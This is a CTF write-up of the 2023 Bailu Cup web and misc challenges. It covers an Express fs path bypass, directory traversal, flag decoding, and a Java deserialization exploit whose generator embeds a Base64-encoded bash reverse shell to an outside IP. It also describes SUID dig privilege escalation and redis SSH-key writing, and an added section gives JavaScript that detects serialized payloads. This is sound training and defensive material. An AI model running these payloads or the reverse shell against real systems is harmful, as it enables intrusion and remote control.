2023柏鹭杯

WEB

express fs

Reference: https://www.cnblogs.com/91ac0m0/p/17557039.html

?file[protocol]=file:&file[href]=a&file[pathname]=fl%2561g.txt&file[hostname]=&file[origin]=x

Comprehensive Challenge 5

The source contains a /readfile?filename= endpoint.

Directory traversal reads an arbitrary file: /../../../../../app/demo.jar

This gives us the application source.

Upload.class: the Upload class contains an obfuscated, encrypted flag1.

Reversing the obfuscation recovers flag1:

import java.util.Base64;

public class ReverseUpload {
    // XOR key recovered from the obfuscated Upload class
    private String O0O = "6925cc02789c1d2552b71acc4a2d48fd";

    public static void main(String[] args) {
        ReverseUpload uploader = new ReverseUpload();
        String originalEncFlag1 = uploader.decryptEncFlag1();
        System.out.println("Original enc_flag1: " + originalEncFlag1);
    }

    // The stored value is Base64(plaintext XOR repeating key); undo both steps.
    private String decryptEncFlag1() {
        String base64EncodedFlag1 = "UFVTUhgqY3d0FQxRVFcHBlQLVwdSVlZRVlJWBwxeVgAHWgsBWgUAAQEJRA==";
        byte[] decodedBytes = Base64.getDecoder().decode(base64EncodedFlag1);
        String decodedString = new String(decodedBytes);

        StringBuilder decryptedFlag = new StringBuilder();
        for (int i = 0; i < decodedString.length(); i++) {
            char originalChar = decodedString.charAt(i);
            // key repeats every O0O.length() characters
            char oOO = this.O0O.charAt(i % this.O0O.length());
            char encryptedChar = (char) (originalChar ^ oOO);
            decryptedFlag.append(encryptedChar);
        }

        return decryptedFlag.toString();
    }
}

// Original enc_flag1: flag{ISEC-52e353a950c752b3dc8f0d1c949f0361}

Comprehensive Challenge 6

In the source, Ping.class is a malicious class: its readObject runs on deserialization and calls exec, which gives command execution.

The Upload class exposes the route /internalApi/v3.2/updateConfig, which deserializes its input; sending a serialized Ping object to it loads the malicious class and executes the command.

Ser.java

package com.example.demo;

import java.io.*;
import java.util.Base64;

public class Ser {
    public static void main(String[] args) throws Exception {
        // Create a Ping object
        Ping ping = new Ping();
        ping.setCommand("bash");
        ping.setArg1("-c");
        ping.setArg2("bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEyLjI1MS42Mi80NTY3IDA+JjE=}|{base64,-d}|{bash,-i}'");

        // Serialize the Ping object to a byte array
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(ping);

        // Encode the byte array to Base64
        String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
        System.out.println("Payload: " + payload);
    }
}
// Payload: rO0ABXNyABVjb20uZXhhbXBsZS5kZW1vLlBpbmcAAAAAAAAAAQIAA0wABGFyZzF0ABJMamF2YS9sYW5nL1N0cmluZztMAARhcmcycQB+AAFMAAdjb21tYW5kcQB+AAF4cHQAAi1jdABfYmFzaCAtYyAne2VjaG8sWW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eExqRXlMakkxTVM0Mk1pODBOVFkzSURBK0pqRT19fHtiYXNlNjQsLWR9fHtiYXNoLC1pfSd0AARiYXNo
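From the defender's side, the payload above is easy to recognise on the wire: every Java serialization stream starts with the magic bytes AC ED 00 05 (rO0AB in Base64), and the first class descriptor names the top-level class. As an added example (not code from the writeup or the challenge), the following detection logic decodes a Base64 body of the kind sent to /internalApi/v3.2/updateConfig, extracts that leading class name and compares it against an allowlist. The allowlisted class com.example.demo.Config and the function names are assumptions; SAMPLE_BODY is the start of the payload printed by Ser.java, cut after the first class descriptor.

```javascript
// Added example, not code from the original writeup or the challenge.
// Detection for Java-serialization bodies reaching an endpoint such as
// /internalApi/v3.2/updateConfig. Assumptions: the endpoint legitimately accepts
// only the constructed class com.example.demo.Config, and bodies arrive Base64-encoded.

const STREAM_MAGIC = Buffer.from([0xac, 0xed, 0x00, 0x05]); // STREAM_MAGIC + STREAM_VERSION
const TC_OBJECT = 0x73;     // "new object" tag
const TC_CLASSDESC = 0x72;  // class descriptor: u16 name length, then the class name

// Allowlist of classes this endpoint is expected to deserialize (constructed).
const ALLOWED_CLASSES = ['com.example.demo.Config'];

// Leading bytes of the payload printed by Ser.java, cut after the first class
// descriptor: magic, TC_OBJECT, TC_CLASSDESC, 0x0015, "com.example.demo.Ping".
const SAMPLE_BODY = 'rO0ABXNyABVjb20uZXhhbXBsZS5kZW1vLlBpbmcA';

// Returns the class named by the first class descriptor of a Java serialization
// stream, or null if the bytes do not start with magic + TC_OBJECT + TC_CLASSDESC.
function leadingClassName(bytes) {
  if (bytes.length < 8 || !bytes.subarray(0, 4).equals(STREAM_MAGIC)) return null;
  if (bytes[4] !== TC_OBJECT || bytes[5] !== TC_CLASSDESC) return null;
  const nameLength = bytes.readUInt16BE(6);
  if (bytes.length < 8 + nameLength) return null;
  // Class names are modified UTF-8; for ASCII identifiers utf8 decoding is identical.
  return bytes.subarray(8, 8 + nameLength).toString('utf8');
}

// Classifies one Base64 request body: not a Java stream, allowed class, or block.
function inspectBody(base64Body, allowedClasses = ALLOWED_CLASSES) {
  const bytes = Buffer.from(base64Body.trim(), 'base64');
  const javaSerialized = bytes.length >= 4 && bytes.subarray(0, 4).equals(STREAM_MAGIC);
  if (!javaSerialized) {
    return { javaSerialized: false, className: null, verdict: 'not-java-serialized' };
  }
  const className = leadingClassName(bytes);
  const verdict = className !== null && allowedClasses.includes(className) ? 'allow' : 'block';
  return { javaSerialized: true, className, verdict };
}

// Builds a minimal stream prefix for a class name (used to produce a benign sample).
function streamPrefixFor(className) {
  const name = Buffer.from(className, 'utf8');
  const header = Buffer.from([TC_OBJECT, TC_CLASSDESC, name.length >> 8, name.length & 0xff]);
  return Buffer.concat([STREAM_MAGIC, header, name]);
}

console.log(inspectBody(SAMPLE_BODY)); // { javaSerialized: true, className: 'com.example.demo.Ping', verdict: 'block' }
```

This only inspects the first class descriptor, so it is a signal for a WAF or log pipeline rather than a fix: a gadget chain can begin with an allowed top-level class whose fields reference the dangerous ones. The fix belongs in the JVM, either by not deserializing untrusted input at all or by installing an ObjectInputFilter allowlist (JEP 290, Java 9+), which rejects every class in the stream that is not explicitly permitted.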

Reverse shell

find the SUID binaries with find; dig is SUID, so privilege escalation is /usr/bin/dig -f /root/flag2

Comprehensive Challenge 7

I ran out of time on this one during the competition; I had uploaded an msf implant to the server, set up a tunnel, and written an SSH public key through redis.

After the competition I read many other players' writeups; they all proxied in with frp, wrote the public key, and then connected.

For details see:

星盟, V3g3t4ble, fushuling's blog

MISC

Sign-in

The number of spaces on each line is the ASCII code of one flag character; converting line by line gives the flag.

# Each line of qd.txt consists only of spaces; the count is one ASCII code.
x = ''
with open('qd.txt', 'r') as f:
    aa = f.readlines()
for i in aa:
    # strip only the line terminator so the spaces are counted exactly,
    # whether or not the last line ends with a newline
    x += chr(len(i.rstrip('\n')))
print(x)
# flag{ISEC-eF8x2Bv1viw9eFvagivx0Ynv3jlai0vL}

http://example.com/2023/10/18/2023柏鹭杯/
Author: dddkia, published 2023-10-18